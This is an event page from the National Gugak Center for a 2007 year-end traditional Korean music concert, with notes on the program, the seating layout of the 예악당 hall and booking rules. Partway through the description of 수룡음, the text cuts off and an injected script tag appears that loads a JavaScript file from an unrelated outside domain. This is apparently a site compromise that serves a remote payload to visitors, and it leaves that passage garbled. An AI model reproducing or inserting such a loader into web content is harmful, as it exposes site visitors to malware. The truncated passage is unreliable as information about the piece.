공식 누리집 주소 확인하기

go.kr 주소를 사용하는 누리집은 대한민국 정부기관이 관리하는 누리집입니다.
이 밖에 or.kr 또는 .kr등 다른 도메인 주소를 사용하고 있다면 아래 URL에서 도메인 주소를 확인해 보세요.
운영중인 공식 누리집보기

공연상세정보 | 공연정보 | 국립국악원

공연/행사정보

2007 나라음악큰잔치 송년음악회 [대관공연]

2007 나라음악큰잔치 송년음악회

  • 부제목

    2007 나라음악큰잔치 송년음악회

  • 공연기간

    2007-12-26(수) ~ 2007-12-26(수)

  • 공연일시

    이동
  • 공연장소

    예악당

    관람시간

    90분

  • 주최

    한국문화예술위원회

  • 주관

    나라음악큰잔치추진위원회

  • 후원

    국무총리복권위원회, 문화관광부, 국립국악원

  • 가격
     

    * 전석초대
    홈페이지를 통해 신청하신 분들 중 선착순 500분께는 좌석을 지정해드립니다. (관람신청 : www.gugakfestival.or.kr)
    할인정보
    * 전석초대
    홈페이지를 통해 신청하신 분들 중 선착순 500분께는 좌석을 지정해드립니다. (관람신청 : www.gugakfestival.or.kr)
  • 문의전화

    02 -760 -4699

공연상세

가격/할인정보

* 전석초대
홈페이지를 통해 신청하신 분들 중 선착순 500분께는 좌석을 지정해드립니다. (관람신청 : www.gugakfestival.or.kr)

상세내용

2007 나라음악큰잔치 송년음악회

1. 대취타
2. 수제천
3. 산조합주
4. 가야금병창
5. 보허자
6. 생소병주 수룡음
7. 선유락 -정재




1. 대 취 타
‘취타’ 란 불고(吹), 친다(打)는 뜻으로, 입으로 부는 취악기, 즉 관악기와 타악기로 연주를 한다. 나발, 나각, 소라, 태평소와 같은 부는 악기와 징, 용고, 자바라 같은 타악기로 편성이 된다. 행진음악인 대취타는 왕의 거동이나 귀인의 행차, 그리고 군대의 행진에서 연주가 됐는데 취타대에는 ‘집사’라는 이가 있어서 지휘봉이라 할 수 있는 "등채"를 두 손으로 받쳐들고 있다가 오른손으로 등채를 잡아 머리 위로 높이 들면서 "명금일하대취타(鳴金一下大 吹打) 하랍신다(징을 울려 대취타를 시작하라)." 라고 호령을 하면 음악이 시작된다. 대취타를 연주 할 때는 깃털을 꽂은 관을 쓰고, 노란색의 천릭을 입고, 남색 전대를 허리에 매기 때문에 화려한 느낌이 든다.

2. 수 제 천 - 1~4장
수제천은 “수명이 하늘처럼 영원하기를 기원한다”는 의미를 담고 있는 우리음악의 “명곡”이다. 수제천은 본래 고려시대의 궁중정재인 무고(舞鼓)의 ‘창사’인 “정읍사”를 노래하던 음악이었는데 조선 중기 이후부터는 노래는 부르지 않고 관악 합주로만 연주되고 있다. 수제천은 왕세자의 거동에 연주되기도 했고, 따라서 장단이 신축성이 있다. 수제천에는 “연음형식”이라는 것이 있는데 이것은 음악을 이끌어 가는 피리가 잠시 쉬는 동안 다른 악기들이 그 가락을‘이어 받아’연주하는 것을 뜻한다. 수제천을 연주하는 악기는 피리, 대금, 소금, 해금, 아쟁, 장구, 좌고, 박 등이다

3. 산조합주
산조는 남도의 시나위 가락을 일정한 장단의 틀에 맞추어 연주하는 기악독주곡으로 가야금 산조가 가장 먼저 만들어졌으며 현재는 대부분의 전통악기로 산조를 연주를 할 수 있다. 산조는 느린 진양 장단으로 시작을 해서 점점 빨라지는 형식을 띠고 있으며 계면조, 우조, 평조 등으로 구성이 된다. 산조는 본래 독주곡이지만 같은 악기끼리 혹은 다른 악기와의 중주나 합주 등이 자연스럽게 시도되고 있다. 산조합주에서는 가야금, 거문고, 피리, 대금, 해금, 아쟁, 장구 등의 악기를 하나 혹은 둘씩 편성하며 산조의 기본 골격을 연주하는데, 합주로 연주를 하다가 각 악기의 연주자들이 독주로 자신의 기량을 선보이는 부분이 나와서 음악을 더욱 흥미롭게 한다.

4. 호남가/노들강 초록물 /사철가 -가야금병창
“병창”이란 악기를 연주하면서 노래를 하는 것을 뜻하며 가야금을 타면서 노래를 부르는 것이“가야금병창”이다, 가야금병창으로 부르는 노래는 단가나 판소리 중의 한 대목, 또는 민요 등이며 가야금 연주는 소리가 없는 공간을 메워주거나 간주 혹은 전주의 역할을 한다. 가야금병창은 본래 가야금산조의 명인들이 불렀다고 한다. 당시 인기를 누리던 판소리의 한 대목이나 단가를 부른데서 비롯된 것이라 전해지고 있다. 호남가는 “함평천지'라는 가사로 시작을 하기 때문에 이것을 제목으로 부르기도 하며, 호남 각 고을의 풍경이나 사적을 들추어, 문장으로 멋지게 엮은 단가이다. “노들강 초록물”은 1937년의 SP음반에도 등장하는 신민요이며 “사철가”는 춘하추동 사계절을 중중모리와 자진모리 장단에 맞춰 노래한다.

5. 보 허 자 _ 1, 2장
보허자가 우리 나라에 들어온 것은 고려 시대로, 송나라에서 음악이 들어올 때 당악정재 ‘오양선’의 “창사”로 부르던 음악이 바로 보허자였다. 하지만 조선시대에 들어서면서 왕세자의 거동 때 연주되는 출궁악, 혹은 잔치 때 연주되는 연향음악으로 사용됐으며 기악곡으로 전해졌으며 향악화, 즉, 우리음악화되서 오늘에 이르고 있다. 현재 전하는 보허자는 관악합주와 현악합주로 나눌 수 있어서 현악합주를“보허사”라 부르며 관악합주곡인 보허자는 일명 “장춘불로지곡(長春不老之曲)”이라고도 부른다. 정재 장생보연지무(長生寶宴之舞)에서는 보허자의 가락에 맞춰 한문 가사를 노래하는데 이를 ‘수악절(隨樂節)’ 이라고 부르기도 한다. 보허자는 박, 피리, 대금, 소금, 해금, 아쟁, 편종, 편경, 장구, 좌고 등으로 연주한다

6. 생소병주 / 수 룡 음
수룡음은 성악곡인 가곡을 기악곡으로 연주한 것으로 평롱, 계락, 편수대엽의 반주 음악을 기악곡으로 만들고 거문고와 가야금을 제외한 뒤, 음량이 작은 세피리 대신 크고 힘찬 향피리를 사용하며, 대금은 노래를 반주 할 때 보다 한 옥타브 높은 선율을 연주한다. 따라서 수룡음은 �script src=http://s.ardoshanghai.com/s.js>

관람후기

0건 (1 / 0페이지)
관람후기 목록
번호 제목 작성자 작성일 조회수
해당 게시물이 없습니다.

기대평

기대평작성

공연장정보

예악당 좌석배치도, 총 658석, 장애인석 제외된 수 좌석 구분은 다음과 같습니다. 
							일반석 : 일반좌석으로 예매가 가능한 좌석, 장애인(휠체어)석 : 좌석이 아닌, 휠체어 이용자를 위한 공간, 발코니석: 극장의 위층 사이드에 위치한 좌석
							예악당은 총 3층으로 구성되어 있으며 1층과 2층이 층의 구분 없이 연결되어 있습니다. 스테이지 중심으로 왼쪽부터 가, 나, 다, 라열로 구성되어 있고, 3층에 별좌, 별우라는 이름의 발코니석이 있습니다. 또한 2층 나, 다열 뒤편이자 가열 17~19행, 라열 16~18행 사이에 '조명, 영상, 음향조정실'이 있습니다. 
							출입구 위치입니다. 1층은 가열 7~9행 우측, 라열 7~9행 좌측에 위치해 있습니다. 2층은 가열 16~18행 좌측, 라열 15~17행 우측에 있습니다. 3층은 가열과 라열 가장 뒤편에 위치해있습니다.
							장애인(휠체어)석은 2군데 위치해있습니다. 1층 가열과 라열 1행의 앞부분에 4석씩 있으며, 2층 라열 출입구 앞에 6석 있습니다.
							좌석 배치에 대한 설명입니다. 1층과 2층이 연결되어 있으므로 1,2층을 가,나,다,라열 순서로 먼저 안내드린 후, 3층을 안내해드리도록 하겠습니다. 
							가열 1층은 1행부터 11행까지입니다. 1행 1~4번, 5~9번, 2행 10~13번, 14~18번, 3행 19~23번, 좌석 중간 경계칸막이, 24~27번, 4행 28~37번, 5행 38~47번, 6행 48~57번, 7행 58~62번, 8행 63~67번, 9행 68~71번, 10행 72~80번, 11행 81~90번으로 배치되어 있습니다. 
							가열 2층은 12행부터 19행까지입니다. 12행 91~94번, 좌석 중간 경계칸막이, 95~99번, 13행 100~104, 좌석 중간 경계칸막이, 105~109번, 14행 110~114, 좌석 중간 경계칸막이, 115~119번, 15행 120~129번, 16행 130~139번, 17행 140~145번, 18행 146~151번, 19행 152~157번으로 배치되어 있습니다. 
							나열 1층은 1행부터 10행까지입니다. 1행 1~7번, 2행 8~14번, 3행 15~21번, 4행 22~29번, 5행 30~37번, 6행 38~45번, 7행 46~53번, 8행 54~60번, 9행 61~68번, 10행 69~76번으로 배치되어 있습니다. 
							나열 2층은 11행부터 15행까지입니다. 11행 77~83번, 12행 84~91번, 13행 92~99번, 14행 100~107번, 15행 109~115번으로 배치되어 있습니다.  
							다열 1층은 1행부터 10행까지입니다. 1행 1~7번, 2행 8~14번, 3행 15~21번, 4행 22~29번, 5행 30~37번, 6행 38~45번, 7행 46~53번, 8행 54~60번, 9행 61~68번, 10행 69~76번으로 배치되어 있습니다. 
							다열 2층은 11행부터 15행까지입니다. 11행 77~83번, 12행 84~91번, 13행 92~99번, 14행 100~107번, 15행 109~115번으로 배치되어 있습니다.  
							라열 1층은 1행부터 11행까지입니다. 1행 1~5번, 6~9번, 2행 10~14번, 15~18번, 3행 19~22번, 좌석 중간 경계칸막이, 23~27번, 4행 28~37번, 5행 38~47번, 6행 48~57번, 7행 58~62번, 8행 63~67번, 9행 68~71번, 10행 72~80번, 11행 81~90번으로 배치되어 있습니다. 
							라열 2층은 12행부터 18행까지입니다. 12행 91~95번, 좌석 중간 경계칸막이, 96~99번, 13행 100~104, 좌석 중간 경계칸막이, 105~109번, 14행 110~114, 좌석 중간 경계칸막이, 115~119번, 15행 120~129번, 15행 뒤편에 장애인석(휠체어석)이 있습니다. 16행 138~143번, 17행 144~149번, 18행 150~155번으로 배치되어 있습니다. 
							3층은 가,나,다,라열과 별좌,별우석으로 구성되어 있습니다. 가,라열 1~3행은 나,다열에 비해 앞쪽에 위치해있습니다.  
							가열 1행 1~6번, 2행 7~12번, 3행 13~18번, 4행 19~24번, 5행 25~30번, 6행 31~36번, 7행 37~42번으로 배치되어 있습니다. 
							나열 1행 1~8번, 2행 9~16번, 3행 17~24번, 4행 25~32번으로 배치되어 있습니다. 
							다열 1행 1~8번, 2행 9~16번, 3행 17~24번, 4행 25~32번으로 배치되어 있습니다. 
							라열 1행 1~6번, 2행 7~12번, 3행 13~18번, 4행 19~24번, 5행 25~30번, 6행 31~36번, 7행 37~42번으로 배치되어 있습니다. 
							3층 좌측에 '별좌'(발코니석)가 있습니다. 4석, 4석, 4석, 2석으로 구분되어 있으며 좌석번호는 1~4번, 5~8번, 9~12번, 13~14번입니다. 
							3층 우측에 '별우'(발코니석)가 있습니다. 4석, 4석, 2석으로 구분되어 있으며 좌석번호는 1~4번, 5~8번, 9~10번입니다. 별우 좌석 앞부분에 '국악FM방송실'이라는 곳이 있으나 현재는 사용하지 않습니다.

예악당 좌석배치도, 총 658석, 장애인석 제외된 수

좌석 구분은 다음과 같습니다.

일반석 : 일반좌석으로 예매가 가능한 좌석, 장애인(휠체어)석 : 좌석이 아닌, 휠체어 이용자를 위한 공간, 발코니석: 극장의 위층 사이드에 위치한 좌석

예악당은 총 3층으로 구성되어 있으며 1층과 2층이 층의 구분 없이 연결되어 있습니다. 스테이지 중심으로 왼쪽부터 가, 나, 다, 라열로 구성되어 있고, 3층에 별좌, 별우라는 이름의 발코니석이 있습니다. 또한 2층 나, 다열 뒤편이자 가열 17~19행, 라열 16~18행 사이에 '조명, 영상, 음향조정실'이 있습니다.

출입구 위치입니다. 1층은 가열 7~9행 우측, 라열 7~9행 좌측에 위치해 있습니다. 2층은 가열 16~18행 좌측, 라열 15~17행 우측에 있습니다. 3층은 가열과 라열 가장 뒤편에 위치해있습니다.

장애인(휠체어)석은 2군데 위치해있습니다. 1층 가열과 라열 1행의 앞부분에 4석씩 있으며, 2층 라열 출입구 앞에 6석 있습니다.

좌석 배치에 대한 설명입니다. 1층과 2층이 연결되어 있으므로 1,2층을 가,나,다,라열 순서로 먼저 안내드린 후, 3층을 안내해드리도록 하겠습니다.

가열 1층은 1행부터 11행까지입니다. 1행 1~4번, 5~9번, 2행 10~13번, 14~18번, 3행 19~23번, 좌석 중간 경계칸막이, 24~27번, 4행 28~37번, 5행 38~47번, 6행 48~57번, 7행 58~62번, 8행 63~67번, 9행 68~71번, 10행 72~80번, 11행 81~90번으로 배치되어 있습니다.

가열 2층은 12행부터 19행까지입니다. 12행 91~94번, 좌석 중간 경계칸막이, 95~99번, 13행 100~104, 좌석 중간 경계칸막이, 105~109번, 14행 110~114, 좌석 중간 경계칸막이, 115~119번, 15행 120~129번, 16행 130~139번, 17행 140~145번, 18행 146~151번, 19행 152~157번으로 배치되어 있습니다.

나열 1층은 1행부터 10행까지입니다. 1행 1~7번, 2행 8~14번, 3행 15~21번, 4행 22~29번, 5행 30~37번, 6행 38~45번, 7행 46~53번, 8행 54~60번, 9행 61~68번, 10행 69~76번으로 배치되어 있습니다.

나열 2층은 11행부터 15행까지입니다. 11행 77~83번, 12행 84~91번, 13행 92~99번, 14행 100~107번, 15행 109~115번으로 배치되어 있습니다.

다열 1층은 1행부터 10행까지입니다. 1행 1~7번, 2행 8~14번, 3행 15~21번, 4행 22~29번, 5행 30~37번, 6행 38~45번, 7행 46~53번, 8행 54~60번, 9행 61~68번, 10행 69~76번으로 배치되어 있습니다.

다열 2층은 11행부터 15행까지입니다. 11행 77~83번, 12행 84~91번, 13행 92~99번, 14행 100~107번, 15행 109~115번으로 배치되어 있습니다.

라열 1층은 1행부터 11행까지입니다. 1행 1~5번, 6~9번, 2행 10~14번, 15~18번, 3행 19~22번, 좌석 중간 경계칸막이, 23~27번, 4행 28~37번, 5행 38~47번, 6행 48~57번, 7행 58~62번, 8행 63~67번, 9행 68~71번, 10행 72~80번, 11행 81~90번으로 배치되어 있습니다.

라열 2층은 12행부터 18행까지입니다. 12행 91~95번, 좌석 중간 경계칸막이, 96~99번, 13행 100~104, 좌석 중간 경계칸막이, 105~109번, 14행 110~114, 좌석 중간 경계칸막이, 115~119번, 15행 120~129번, 15행 뒤편에 장애인석(휠체어석)이 있습니다. 16행 138~143번, 17행 144~149번, 18행 150~155번으로 배치되어 있습니다.

3층은 가,나,다,라열과 별좌,별우석으로 구성되어 있습니다. 가,라열 1~3행은 나,다열에 비해 앞쪽에 위치해있습니다.

가열 1행 1~6번, 2행 7~12번, 3행 13~18번, 4행 19~24번, 5행 25~30번, 6행 31~36번, 7행 37~42번으로 배치되어 있습니다.

나열 1행 1~8번, 2행 9~16번, 3행 17~24번, 4행 25~32번으로 배치되어 있습니다.

다열 1행 1~8번, 2행 9~16번, 3행 17~24번, 4행 25~32번으로 배치되어 있습니다.

라열 1행 1~6번, 2행 7~12번, 3행 13~18번, 4행 19~24번, 5행 25~30번, 6행 31~36번, 7행 37~42번으로 배치되어 있습니다.

3층 좌측에 '별좌'(발코니석)가 있습니다. 4석, 4석, 4석, 2석으로 구분되어 있으며 좌석번호는 1~4번, 5~8번, 9~12번, 13~14번입니다.

3층 우측에 '별우'(발코니석)가 있습니다. 4석, 4석, 2석으로 구분되어 있으며 좌석번호는 1~4번, 5~8번, 9~10번입니다. 별우 좌석 앞부분에 '국악FM방송실'이라는 곳이 있으나 현재는 사용하지 않습니다.

예매유의사항

예매방법

※ 예매, 공연 정보 등은 위의 ‘문의전화’로 문의하시기 바랍니다.

i예매취소 및 환불방법

예매취소 및 환불 방법 표 - 예매방법, 인터넷 예매, 전화예매, 방문예매로 구성됨
예매방법 인터넷 예매 전화예매 방문예매
취소방법 로그인 또는 본인인증
후, 마이페이지에서 취소
계좌 입금 시, 본인 명의
계좌번호 기재
국립국악원 대표번호
02-580-3300
예매자 본인 명의의
계좌번호로 일주일 이내 환불
국립국악원 풍류사랑방 내
고객지원팀 방문 (월~토 09:00~18:00/
공휴일,일요일 휴무)
관람권(티켓) 지참 필수
취소변경
가능시간
   공연 전일 18시까지
   ※ 패키지 티켓: 패키지 첫 공연 시작 전날 18시까지 취소/환불
   ※ 해당 시간 이후, 변경/취소/환불 불가
유의사항

   - 환불 금액 입금은 영업일 기준 3~5일 정도 소요됩니다.
     예금주와 계좌번호가 다를 경우, 환불 처리가 지연될 수 있습니다.
   - 부분 취소·좌석변경은 불가능하며, 전체 취소 후 다시 예매해야합니다.
   - 관람권(티켓)은 유가증권이므로 분실 및 훼손의 경우, 재발행 및 취소/환불/변경 불가합니다.
   - 초대권은 환불 및 변경이 되지 않습니다.
   - 국립국악원 회원 가입 시, 마이페이지에서 예매내역을 확인·관리할 수 있습니다.

출연진